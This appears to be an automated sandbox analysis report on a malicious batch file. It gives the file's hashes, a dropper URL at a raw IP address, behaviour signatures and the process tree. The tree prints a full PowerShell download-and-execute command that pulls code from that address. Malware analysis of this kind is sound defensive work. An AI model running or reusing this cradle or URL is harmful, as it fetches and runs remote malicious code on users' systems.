Analysis
-
max time kernel
106s -
max time network
108s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
24-03-2020 01:10
General
-
Target
w7MPmXqT.bat
-
Size
196B
-
MD5
f27899524a4ad3e77954797a979ba0d8
-
SHA1
281223c4cf1338fa2f2ea469ea8e6f0246b5adb0
-
SHA256
359a07b1df7b142cfd37af0d9cdbc28ace2ca7ffc9bd778fde48bfa501a69d79
-
SHA512
2bf71ad0387cf7c0b48dca5dc95c403fa2bb7539e155505e8f740f5f991cbb4c266bf0bc790a16a4915f7c72bad871ac437f08c19ee918b2386086409a87e97d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/w7MPmXqT
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\w7MPmXqT.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/w7MPmXqT');Invoke-SZOMRMAUGUIDZ;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB